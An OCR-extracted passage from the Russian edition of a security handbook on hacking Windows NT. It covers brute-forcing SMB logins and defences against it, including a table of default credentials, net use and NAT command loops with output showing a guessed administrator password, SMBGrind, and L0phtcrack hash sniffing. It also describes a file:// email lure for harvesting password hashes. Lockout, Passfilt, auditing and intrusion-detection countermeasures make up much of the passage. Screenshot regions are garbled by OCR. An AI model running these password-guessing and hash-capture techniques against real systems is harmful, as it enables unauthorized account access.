Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей

Подождите немного. Документ загружается.

А Многие популярные программы функционируют в контексте специальной

пользовательской учетной записи. Как правило, имена этих учетных записей

широко известны и, что еще хуже, обычно они легко запоминаются. Иденти-

фикация подобных широко известных учетных записей во время инвентариза-

ции может предоставить взломщику очень серьезный козырь, значительно об-

легчающий его задачу при подборе пароля.

Некоторые примеры стандартных пар "имя пользователя/пароль" представлены в

табл.

5.1.

Мы называем такие пары наиболее вероятными комбинациями. Кроме того,

достаточно большой список паролей, используемых по умолчанию, можно найти по

адресу

http://www.securityparadigm.com/defaultpw.htm.

Таблица

5.1.

Наиболее

вероятные

комбинации "имя пользователя/пароль"

Имя пользователя Пароль

Administrator

пустой,

password, administrator

Arcserve arcserve, backup

Test test, password

Lab lab, password

имя-пользователя

имя-пользователя, имя-компании

Backup backup

Tivoli tivoli

symbiator

symbiator, as400

Arcserve, backupexec backup

Хорошо продуманная стратегия подбора паролей, учитывающая все приведенные

выше рекомендации, дает на удивление высокий процент успеха. Однако техника, ко-

торая хороша для хакера, подбирающего пароль ради развлечения, вряд ли заинтере-

сует вечно занятого администратора сети, у которого и так хватает забот, чтобы зани-

маться ручным подбором паролей с целью контроля.

Автоматизированный подбор паролей очень легко выполнить, реализовав единствен-

ный цикл FOR с использованием стандартной команды NET USE системы NT. Во-первых,

создайте файл с именами пользователей и паролями на основе наиболее вероятных ком-

бинаций, приведенных в табл. 5.1 (или воспользовавшись собственным перечнем). Такой

файл может иметь примерно следующий вид (для разделения значений могут использо-

ваться любые символы-разделители; в данном случае — символы табуляции).

[file:

credentials.txt]

password username

password Administrator

admin Administrator

administrator Administrator

secret Administrator

т.д.

. . .

Теперь этот файл можно подать на вход команде FOR следующим образом:

C:\>FOR

"tokens=l,2*"

%i in

(credentials.txt)

do net use

\\целевой_узел\\

IPC$ %i

/u:%j

Глава 5. Хакинг Windows NT

171

Эта

команда

построчно

анализирует файл

credentials.txt,

выбирает первые

две

лексемы из каждой строки, а затем использует первую из них в качестве переменной

(пароль), а вторую — как переменную % j (имя пользователя) при установке соединения с

помощью команды net use с совместно используемым ресурсом

1РС$

целевого компью-

тера. Для получения более подробной информации о команде FOR введите в командной

строке FOR /?. Эта команда для хакеров NT является одной из наиболее полезных.

Конечно, имеется много специализированных программ, которые позволяют авто-

матизировать процессе подбора пароля. В главах 3 и 4 мы уже упоминали программы

Legion и NAT (NetBIOS Auditing Tool), которые позволяют автоматизировать процесс

подбора пароля. Утилита Legion может не только выполнять сканирование диапазона

IP-адресов класса С и выявлять совместно используемые ресурсы Windows, но и обла-

дает возможностью подбора пароля по заданному словарю.

Программа NAT предоставляет аналогичные возможности, но позволяет одновре-

менно работать с одним компьютером. Однако, поскольку эта утилита запускается из

командной

строки,

ее использование очень легко автоматизировать. В сценарии или

командном файле утилита NAT должна подключаться к очередному узлу, а затем под-

бирать пароль как из предопределенного перечня паролей, так и из списка, подготов-

ленного пользователем. Одним из недостатков NAT является то, что как только эта

утилита обнаруживает пароль, соответствующий какой-либо из учетных записей, она

тут же использует эту пару для подключения, поэтому остальные возможные пароли

других учетных записей остаются неизвестными. Ниже приведен пример простого

цикла FOR, с помощью которого организуется перебор всех компьютеров сети класса

С. (Для краткости листинг был отредактирован.)

D:\>

FOR /L

(1,1,254)

nat

-u

userlist.txt

-p

passlist.txt

192.168.202.%!

nat_output.txt

[*]

Checking host:

192.168.202.1

[*]

Obtaining

list

remote

NetBIOS

names

[*]

Attempting

connect with

Username:

'ADMINISTRATOR'

Password:

'ADMINISTRATOR'

[*]

Attempting

connect with

Username:

'ADMINISTRATOR'

Password:

'GUEST'

CONNECTED:

Username:

'ADMINISTRATOR'

Password:

'PASSWORD'

[*]

Attempting

access

\\*SMBSERVER\TEMP

[*]

WARNING:

Able

access

\\*SMBSERVER\TEMP

[*]

Checking

write

access

in:

\\*SMBSERVER\TEMP

[*]

WARNING:

Directory

writeable:

\\*SMBSERVER\TEMP

[*]

Attempting

exercise

bug on:

\\*SMBSERVER\TEMP

Еще одним хорошим инструментом обнаружения паролей является утилита NTInfoScan

(NTIS) Дэвида

Литчфилда

(David

Litchfield),

который известен также под псевдонимом

Mnemonix.

Эту

утилиту можно найти

по

адресу

http:

//packetstormsecurify.

org/NT/audit/. NTIS — это простая утилита командной строки, которая выполняет про-

верку по протоколам Internet и NetBIOS, а

результат

выводит в HTML-файл. Она осущест-

вляет также все необходимые операции по инвентаризации пользователей, а в конце отче-

та помещает учетные записи с пустым паролем.

Все упомянутые выше утилиты распространяются бесплатно и, в общем, прекрас-

но справляются с возложенной на них задачей. Если же вам нужны дополнительные

возможности, предоставляемые коммерческими пакетами, рекомендуем обратить

внимание на пакет

CyberCop

Scanner от компании Network Associates Inc. (NAI), в со-

став которого входит утилита SMBGrind. Эта утилита отличается поразительной ско-

ростью работы, поскольку она параллельно запускает несколько процессов подбора

пароля. Однако точность этой утилиты далека от совершенства. Можно получить не-

172

Часть II.

Хакинг

систем

правильные результаты, если жестко заданные временные интервалы ожидания не

согласуются с временем, требуемым для достижения исследуемой сети. Во всем ос-

тальном утилита

SMBGrind

практически не отличается от утилиты NAT. Ниже приве-

ден пример результатов работы утилиты SMBGrind. Параметр -1 определяет количе-

ство одновременных соединений, т.е. количество параллельно запускаемых процессов.

D:\>

smbgrind

-I

100 -i 192.168.2.5

5 (*SMBSERVER)

Host address:

Cracking host

Parallel Grinders:

Percent complete:

Guessed: testuser

Percent complete:

Grinding complete,

192.168.2.

100

Password: testuser

100

guessed 1 accounts

О Контрмеры: защита от подбора пароля

Существует несколько защитных мер, которые могут сделать невозможными или, по

крайней мере, затруднить попытки подбора пароля. Первая из них поможет в тех случаях,

когда компьютер с системой NT, непосредственно подключенный к Internet, не должен

отвечать на запросы о совместно используемых ресурсах Windows. Для этого нужно забло-

кировать доступ к портам TCP и

UDP

с номерами 135-139 на пограничном брандмауэре

или маршрутизаторе, а также запретить привязку WINS Client (TCP/IP) для любого адаптера,

подключенного к внешней сети, как показано на приведенной ниже иллюстрации.

Idenffication

Services

Protocols

Adapters

Bindings j

Netwwk

binding}

are

connections between

network

cards,

protocols,

arxiwvicMinaa^от

^computer.

You

can

use

this

page

dsabte

network

bindings

arrange the

older

which

this

compute!

folds

information

the

network

Show

Bindings

tat:

[all

adapters

•-Ш&

(1]Xircom

CardBus

Ethernet

10/100

•T"

NWLink

IPX/SPX

Compatible Transport

TCP/IP

Protocol

NetBIOS

Interface

<2>

Remote Access Server Service

Serve

Workstation

Network

Monitor Agent

[5] Remote Access WAN Wrapper

Щг

[4|

Remote Access WAN Wrapper

ШУ

[2)

Remote

Access WAN Wrapper

Enable

C«abte

Это позволит запретить использование портов NetBIOS соответствующим сетевым

адаптером. Для узлов с двумя сетевыми адаптерами (dual-homed host) необходимо за-

претить поддержку протокола NetBIOS на адаптере, подключенном к Internet, и оста-

вить ее на сетевом адаптере внутренней сети, чтобы к совместным ресурсам Windows

могли обращаться легальные пользователи. (При отключении поддержки NetBIOS с

использованием этого метода внешний порт остается в режиме ожидания, однако он

не будет отвечать на запросы.)

Глава 5. Хакинг Windows NT

173

В системе Windows 2000 для запрещения использования протокола NetBIOS

поверх TCP/IP для каждого адаптера в отдельности можно использовать специ-

альный пользовательский интерфейс. Однако, как вы увидите в главе 6, такая

возможность вовсе не является панацеей, и отключение адаптеров от совмест-

но используемых файлов и принтеров является гораздо лучшим способом.

Если ваши компьютеры с системой NT выполняют роль файловых серверов и, как

следствие, должны обеспечивать возможность подключения, данных мер, естественно,

будет недостаточно, поскольку они будут блокировать или даже запрещать все подоб-

ные службы. В таких случаях необходимо применять более традиционные меры: бло-

кировать учетные записи после определенного количества неудачных попыток регист-

рации, реализовать политику строгого выбора паролей, а также регистрировать все не-

удачные попытки регистрации. К счастью, для выполнения этих задач компания

Microsoft предоставляет все необходимые средства.

Политика учетных записей

Одним из таких средств является утилита User Manager. Для задания политики учет-

ных записей выберите в диалоговом окне диспетчера пользователей команду

Poli-

cies^Account.

В появившемся диалоговом окне можно задать определенную политику

назначения паролей, например установить ограничение на минимальную длину пароля

или потребовать, чтобы пароли не повторялись чаще определенного количества раз.

Кроме того, в диалоговом окне Account Policy можно установить блокировку соответст-

вующей учетной записи после заданного количества неудачных попыток регистрации.

Диспетчер пользователей также позволяет администраторам принудительно отключать

пользователей после завершения установленной длительности сеанса. Это очень удобная

возможность, позволяющая "перекрыть кислород" непрошеным ночным гостям.

Domain:

ACME

Password

Restrictions

- -

Maxmum

Password

Afle

, ,

Mnimum

Password

Aae

(

<"~м

'",PatswMdHever£xp«es

Ajlon

Changes

Irmediatebi

<~-

£»pxesln|

|i|

Days

Alow

Changes

In |

^DajrtM

Minimum

Password

Length Password Uniqueness - "r >

Perm»ttank

Password

BoNol

Keep

Password

History

AlLeast|

Charade™

fiementei|

Passwords

•

account

lockout,

Account

lockout

Lockout

aftet

] 4

bad

logon

attempts

, Reset

count

after

[

minutes

Lockout Duration

;

Forever

funtj

admrn

urdocks}

;

Duration

[

minutes

Еогрогу

drsconnect

remote users from server when

iogon

hours

expire

|jsns

must

iqg.

on in

order

change

passworrj

Cereel [

a* |

Подчеркнем еще раз, что каждый, кто намеревается попробовать "на прочность"

пароли как с помощью описанных в данной главе методов ручного, так и автоматиче-

ского подбора, должен помнить о возможности блокировки учетных записей.

174

Часть II. Хакинг систем

Passfilt

Еще больший уровень защиты можно обеспечить с помощью динамически под-

ключаемой библиотеки Passfilt, входящей в состав Service Pack 2. Для того чтобы она

была подключена к системе защиты, необходимо проделать

процедуру,

описанную в

статье

Q161990

базы знаний Microsoft Knowledge Base. Данная библиотека позволяет

поддерживать жесткую политику выбора паролей, которая гарантирует защиту не

только от взлома, но и от ленивого пользователя, выбирающего слишком простой па-

роль. После установки библиотеки Passfilt все пароли должны состоять не менее чем

из шести символов, не совпадать с именами учетных записей или быть частью пол-

ного имени пользователя, а также должны состоять из символов, которые выбираются

как минимум из трех следующих групп.

Т Буквы английского алфавита верхнего регистра (А, в, с, ..., z)

• Буквы английского алфавита нижнего регистра (а, Ь, с, ..., z)

• Арабские цифры (О, 1, 2, ..., 9)

А Символы, не являющиеся алфавитно-цифровыми (@,

& и т.д.)

Библиотека Passfilt должна быть под рукой у каждого серьезного администратора

NT, однако нужно отметить два ее ограничения. Первое состоит в жесткой установке

минимальной длины пароля в 6 символов. Мы рекомендуем наложить более строгое

ограничение в 7 символов в диалоговом окне Account Policy диспетчера пользователей.

(Почему так важна разница в один символ, вы узнаете ниже в разделе "Строгие пра-

вила выбора

пароля".)

Во-вторых, библиотека Passfilt вызывается лишь в том случае,

когда решение об изменении пароля принимает сам пользователь. Если же пароль

меняется администратором с помощью диспетчера пользователей, то выполнение тре-

бований Passfilt не гарантируется (см. статью

Q174075).

Для того чтобы обеспечить

более строгое следование принятой политике учетных записей, можно разработать

свою собственную библиотеку Passfilt (о том, как это осуществить, можно узнать по

адресу http:

//msdn.microsoft.com/library/psdk/logauth/pswd_about_5z77.htm).

Учтите, что при таком подходе в качестве библиотеки Passfilt можно легко "получить

в подарок" "троянского коня". Так что при выборе библиотек от сторонних произ-

водителей будьте очень внимательны.

| Библиотека Passfilt в системе Win 2000 устанавливается по умолчанию, одна-

ко остается неактивной. Для того чтобы ее активизировать, воспользуйтесь

консолью

secpol.msc

или

gpedit.msc

активизируйте

режим

Passwords

must meet complexity requirements, относящийся к элементу консоли Security

Configuration and

Analysis\Account

PoliciesXPassword

Policy.

Passprop

Еще одним важным дополнительным средством, которое входит в состав NT Re-

source Kit (NTRK) является утилита Passprop, которая позволяет применить к учетным

записям домена NT два следующих требования.

Т Пароли, выбираемые пользователями, должны обязательно содержать алфавит-

ные символы как верхнего, так и нижнего регистра или же состоять из симво-

лов и цифр.

А Как мы уже говорили, учетная запись Administrator является наилучшим

трофеем удачливого взломщика, представляющим собой серьезную угрозу безо-

пасности. К сожалению, исходную встроенную учетную запись Administrator

(RID 500) в системе NT заблокировать нельзя, что позволяет взломщикам лег-

ко ее идентифицировать и бесконечно долго пытаться подобрать к ней пароль.

Глава 5. Хакинг Windows NT

175

Утилита Passprop позволяет применить к учетной записи администратора при-

нятую политику блокировки. (Учетную запись Administrator можно всегда

разблокировать с локальной консоли сервера, что предотвратит опасность воз-

никновения состояния DoS.)

Для того чтобы наложить на систему безопасности оба требования, необходимо ус-

тановить пакет NTRK (или просто скопировать файл

passprop.exe,

если установка

всего пакета NTRK связана с вопросами защиты) и ввести следующую команду в ко-

мандной строке:

passprop

/complex

/adminlockout

Для того чтобы вернуть систему в исходное состояние, необходимо запустить ути-

литу с параметром

/noadminlockout.

Аудит и регистрация событий

Даже если никому и не удастся проникнуть в вашу сеть с помощью подбора паро-

ля, так как вы установили библиотеку

Passfilt

или воспользовались утилитой Passprop,

все равно имеет смысл отслеживать все неудачные попытки регистрации. Для этого

выберите команду

Policies^Audit

в диалоговом окне диспетчера пользователей. При

этом на экране появится диалоговое окно Audit Policy, представленное ниже.

Compute.

MICHAEL

ГСо

01Аи

?._.^..

fe№»

Event,,

Logon and

Logo»

Eto

and Object Access

Used

Us»

Right!

U«i

and

Qroup

Management

Security

Policy

Changes

flestart

Shutdowa

and

System

EiocessTtackiio

Success

faikie

Г '

Cancel |

Help |

Журнал безопасности (Security Log), заполненный событиями с идентификаторами

529 или 539 (Logon/Logoff failure и Account Locked Out соответственно), свидетельствует

о том, что система подвергается попытке автоматизированного взлома. В большинстве

случае журнал позволяет даже установить компьютер, с которого производятся по-

пытки взлома. Однако упущением компании Microsoft является то, что в системах NT

и Windows 2000 регистрируется лишь имя NetBIOS компьютера взломщика, а не IP-

адрес. Конечно, имена NetBIOS можно без проблем сфальсифицировать, так что ди-

намическое изменение имени NetBIOS не имеет смысла. Фактически утилита

SMBGrind использует ложное имя NetBIOS, которое можно без проблем изменить с

помощью простого редактора, такого как UltraEdit.

На рис. 5.1 показано содержимое журнала безопасности после многочисленных

неудачных попыток регистрации, предпринятых с помощью утилиты NAT.

176

Часть II.

Хакинг

систем

Log

Ут«

a*°nt

Date

Time

@s/23/99

(§5/22/99

Щ5/г2/99

®5/22/99

5/2

2/99

5/22/99

9:1

4:1

ЗАМ

9:14:06

9:1

3.57

9:13:13АМ

11:57:11

РМ

11:57:05РМ

11:57'ООРМ

11:56:46РМ

11:56:41 РМ

11:56:35РМ

11:56:21 РМ

11:56.16 РМ

11:56:10РМ

11:55:56 РМ

11:55-51

РМ

11:55:16 РМ

11:5531 РМ

11:55:26РМ

11:55:21 РМ

11:55:07РМ

11:55:01 РМ

11:S4:S6PM

11:54

39 РМ

11:54:34РМ

11:54.29РМ

11:54:1

РМ

on \\ACMEPDC1

{Source

Security

Ш^ШШШ

Category

Logon/Logoff

Logan/Logoff

Logon/Log

oft

Logon/Logoff

Log

on/Log

oft

Logon/Logoff

••I

Event

529

539

529

523

529

•ни

User

SYSTEM

HEIDI

'Computer

ACMEPDC1 -

ACMEPDC1

Рис. 5.1. Журнал безопасности с зарегистрированными неудачными попытка-

ми регистрации в сети, выполнявшимися с использованием утилиты NAT

Вот подробные сведения о событии с идентификатором 539.

Dele:

5/23Л9

Evert

Ю:

539

line:

914:16AM

Source:

Scanty

Уж

NTAUTHORITY\SYSTE

Тяж

FdueAud»

Corrjputer:

ACMEPDC1

Category:

Logon/Logoff

^ascription:

.ogon

Failure:

Reason;

Account

locked

out

User Name:

Domak

MICHAEL

Logon Type: 3

Logon

Process:

KSecDD

Authentication

Package:

MICROSOFT

AUTHENTICATION

PACKAGE

V1_0

Workstation

Nam:

^MICHAEL

Естественно, регистрация событий ничего не стоит, если не выполняется анализ

журналов. Анализировать журналы вручную очень утомительно. К счастью, утилита

Event Viewer позволяет фильтровать записи о событиях по дате, типу, источнику, ка-

тегории, пользователю, компьютеру и идентификатору события.

Если для управления журналами и их анализа вам требуется надежная утилита ко-

мандной строки, позволяющая автоматизировать ее использование, обратите внима-

ние на утилиты

dumpel

из пакета NTRK, NTLast и VisualLast компании

Foundstone,

Inc. (по адресу

http://www.foundstone.com

можно найти как бесплатно распро-

страняемую, так и коммерческую версию) или

DumpEvt

от компании

Somarsoft

(бесплатную версию утилиты можно найти

по

адресу

http:

//www.

somarsof

com).

Глава 5. Хакинг Windows NT

177

Утилита

dumpel

может обрабатывать журнал событий с удаленного сервера (при

наличии соответствующих разрешений) и отфильтровывать до десяти идентификато-

ров событий одновременно. Например, с помощью

dumpel

можно извлечь неудачные

попытки регистрации на локальном компьютере (событие 529). Для этого в команд-

ной строке нужно ввести следующую команду.

С:\>

dumpel

-e 529 -f

seclog.txt

-1

security

-m

Security

-t

Утилита DumpEvt позволяет преобразовать весь журнал безопасности в формат,

пригодный для импорта в базу данных Access или SQL. Однако эта утилита не предос-

тавляет средств фильтрации событий.

NTLast — это утилита командной строки Win32, которая выполняет поиск в ло-

кальных и удаленных журналах записей об интерактивных (interactive), удаленных

(remote) и неудачных (fail) попытках регистрации. Кроме того, с ее помощью можно

найти соответствующие друг другу пары событий регистрации/завершения сеанса

(logon/logoff) для заданной учетной записи. Те же возможности предоставляет и ути-

лита с графическим интерфейсом пользователя

VisualLast.

Выявление вторжений в реальном времени

После применения средств анализа журналов следующим этапом является реали-

зация механизма оповещения о возможных нарушениях в реальном времени. Количе-

ство программных продуктов из так называемой категории систем выявления вторже-

ний быстро возрастает, особенно для использования на платформе NT. Системы вы-

явления

вторжений,

предназначенные для использования на компьютерах под

управлением системы NT, представлены в табл. 5.2.

Функциональные возможности этих продуктов варьируются в широком диапазоне,

от простых средств анализа журналов, генерации оповещений (KSM) и мониторинга

попыток взлома на уровне сетевого протокола (RealSecure) до полноценных систем

выявления вторжений на уровне узла (Centrax). Так что при выборе той или иной

системы внимательно ознакомьтесь с перечнем ее возможностей и выясните, сможет

ли она решать возлагаемые на нее задачи.

Таблица 5.2. Некоторые системы выявления вторжений для системы NT/2000

Система выявления вторжений Разработчик

BlacklCE Pro Internet Security Systems

http://www.iss.net/

Centrax Cybersafe Corp.

http://www.cybersafe.com/

CyberCop Server Network Associates, Inc.

http://www.nai.com/

Intact Pedestal Software

http://www.pedestalsoftware.com/

Intruder Alert

(ITA)

Symantec

http://enterprisesecurity.symantec.com/products

RealSecure Internet Security Systems

http://www.iss.net

SessionWall-3

Computer Associates (CA)

http://www.ca.com/Solutions/Product.asp?ID=163

Tripwire for NT Tripwire, Inc.

http://www.tripwiresecurity.com/

178

Часть II. Хакинг систем

К сожалению, обсуждение вопросов, связанных с выявлением вторжений, выходит

за рамки данной книги. Можем лишь подчеркнуть, что администраторы сети, обеспо-

коенные вопросами обеспечения безопасности, должны уделять этой технологии са-

мое пристальное внимание — что может быть важнее, чем вовремя поступивший сиг-

нал о возникшей в сети проблеме?

^•j"'"

Перехват паролей,

передаваемых по сети

Популярность

Простота

Опасность

Степень риска

-~.

Подбор пароля — это нелегкая задача. Почему бы просто не перехватить ценную

информацию при регистрации пользователей на сервере, а затем использовать ее по

своему усмотрению? В тех редких случаях, когда взломщику удается перехватить об-

мен регистрационными данными, такой подход позволяет сэкономить значительную

часть усилий, которые требуются в процессе подбора пароля. Для этого подойдут

многие из уже рассмотренных утилит, однако можно воспользоваться и другим сред-

ством, специально предназначенным для этих целей. С такой утилитой вы уже хоро-

шо

знакомы: lOphtcrack, которую можно найти

по

адресу

http:

//www.10pht.com.

НА

WEB-УЗЛЕ

Утилита lOphtcrack предназначена

для

подбора паролей

NT, она

обыч-

wiiiumspitiistiing.™

используется

дд

автономного взлома перехваченной базы данных

па-

ролей, т.е. без соединения с

сервером.

Такой подход позволяет, во-

первых, не беспокоиться о возможной блокировке учетных записей при

попытках подбора пароля, а во-вторых, организовать перебор сколь угод-

но большого количества вариантов. Получение файла паролей — доволь-

но нетривиальная задача, поэтому этот вопрос, а также методы использо-

вания утилиты lOphtcrack более подробно будут рассмотрены ниже в

разделе "Взлом паролей NT".

В последних версиях lOphtcrack имеется функция

8MB

Packet Capture, которая ра-

нее была реализована в виде отдельной утилиты

readsmb.

Используя эту функцию,

можно обойтись без перехвата файла паролей, а вместо этого прослушать локальный

сегмент сети, перехватить запросы на регистрацию, которыми обмениваются системы

NT, а затем выбрать из них информацию о зашифрованных паролях. Затем выполняется

алгоритм расшифровки, обратный тому, который используется при шифровании паро-

лей в системе NT (этот процесс и называется взломом — cracking). На рис. 5.2 показан

пример использования функции SMP Packet Capture для перехвата пересылаемых по се-

ти паролей с целью их последующего взлома самой утилитой lOphtcrack.

Некоторые читатели могут удивленно воскликнуть: "Подождите! Разве в NT не реали-

зован принцип аутентификации по запросу?"

Это

действительно так. В процессе аутенти-

фикации клиенты получают случайный запрос от сервера, который кодируется с помощью

хэш-кода пароля пользователя в качестве ключа и в зашифрованном виде передается назад

по сети. Затем сервер зашифровывает запрос с помощью своей собственной копии хэш-

кода пароля пользователя (взятой из

SAM-файла)

и сравнивает его с полученным значени-

ем. Если значения совпадают, то процесс регистрации завершается успешно (более под-

робная информация о процессе аутентификации содержится в разделе

Q102716

базы зна-

ний компании Microsoft). Значит, сам хэш-код пароля даже не передается по сети. Возни-

кает вопрос: как в таком случае утилита lOphtcrack может его взломать?

Глава 5.

Хакинг

Windows NT

179

Sonet

IP |

Dentation

ChaUng*

132.168.202.37

192.168.202.37

192.168.202.33

192.16820233

192.168.202.30

192.168202.37

192.168.202.37

192.168.202.33

192.168.202.30

19Z168.202.30

192.158.202.33

192.168.202.33

192.168.20237

192.16ft

202.

192.168.20244

192.168.202.44

192.168.20244

192.168.202.44

1Э2.16В.202.44

192.168.202.44

192.168.202.33

I450ba7411.

I450ba7411

738Ь91ЭЫа.

738b9f3bfe.

3a7cd6360...

ае620еОЫ

...

(450Ьа7411...

M50ba7411..

739ЬЭШе..

738b9(3bfe..

44ddb8bt[7L.

d3eOe!2d8...

7Э8Ь913Ы>...

ТЗВЬЭШв .

d6394218e.

LwMeiHa*

ЬвЬЭ172с<!ЗЭеИ35

11592a8bdOb22aa

076ea8d0768b37ft

40a2ldd0029967d2

acbldld022ad9f3b5...

68d92ad0678cda«...

ЬЙЬЗ|72сеЭЭе0135 .

11592a8bdOb22a5(. .

076ea8d0768b378...

40a2fdd0029967d2...

32965753Ь3213<|5...

BcOa48be6611e1d...

076ea8d0768b378...

40a2dd0029367d2

Oec1e4769763a4c..

L«IH««h

-t

a0823038b4a74.

виИМсЬТЮ.

Юе(33аес21е4

275b4ad876c27,

OOOOOOOOOOOOC

«0823038b4a74

8fad13e5cb78S

66f6f33aec21e4

275b4ad876c27

OOOOOOOOOOOOC

66ИЗЗак21е4

275b4ad876c27~^

45с41(221ЬЬ34с-

Рис. 5.2.

Функция

SMP

Packet

Capture

утилиты

lOphtcrack

позволяет

перехваты-

вать пересылаемые по сети NT запросы на регистрацию для их последующего взлома с

помощью

lOphtcrack.

данном

примере

показано

несколько

систем,

которых

зна-

чение NT Hash представлено нулями. Это означает, что данные системы работают

под управлением Win 9x, которая не поддерживает алгоритма хэширования NT

Очень просто, путем подбора в лоб. Из перехваченного пакета утилита

lOphtcrack получает только сам

запрос

и запрос, закодированный с помощью хэш-

кода пароля. Затем выполняется кодирование известного значения запроса с помо-

щью случайно генерируемых строк, и результат сравнивается с полученным зашифро-

ванным значением запроса. Эта процедура повторяется до тех пор, пока не будет най-

дена случайная строка, для которой результаты окажутся идентичными. Из-за несо-

вершенства алгоритма вычисления хэш-кода LM (на самом деле этот хэш-код состоит

из нескольких фрагментов, которые можно атаковать независимо друг от друга), про-

цесс подбора занимает гораздо меньше времени, чем кажется на первый взгляд.

Эффективность утилиты lOphtcrack при ее совместном использовании с функци-

ей SMP Packet Capture настолько высока, что любой, кто не пожалеет времени для на-

блюдения за сетью, гарантированно сможет получить статус администратора в течение

нескольких дней. Вы замечаете, как неумолимо бежит время?

Даже если вы считаете, что вашу сеть защитит коммутируемая архитектура, не торопи-

тесь с выводами. Например, взломщик может воспользоваться одним из методов перена-

правления

ARP,

чтобы проанализировать весь трафик на своем компьютере, или, что еще

проще, прибегнуть к социальной инженерии, что описано в ответах на часто задаваемые

вопросы (FAQ — Frequently Asked Questions) по использованию утилиты lOphtcrack.

"Отправьте выбранной жертве почтовое сообщение (неважно, на личный адрес

или же на общий адрес компании). В текст письма включите адрес

URL

в форме

file://ваш_компьютер/имя_совместно_используемого_ресурса/сообщение.htm

1. Как только получатель щелкнет на этом URL, его

хэшированный

пароль сразу же

будет отправлен вам для аутентификации."

| При знакомстве с технологиями, подобными перенаправлению

ARP

(см. гла-

ву 10), вы увидите, что коммутируемые сети на самом деле не обеспечивают

надежную защиту от перехвата паролей.

Сотрудники

LOpht

даже умудрились создать утилиту, "выуживающую"

хэшированные

пароли NT из потока данных, которыми обмениваются компьютеры при

регистрации с использованием протокола РРТР (Point-to-Point Tunneling Protocol). В

системе NT адаптированный вариант РРТР используется для организации частных вир-

туальных сетей (VPN — Virtual Private Network). Эта технология позволяет организовы-

вать

туннелирование

потока данных для передачи информации по Internet с

гарантиро-

180

Часть II.

Хакинг

систем

Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей - готовые решения

Подождите немного. Документ загружается.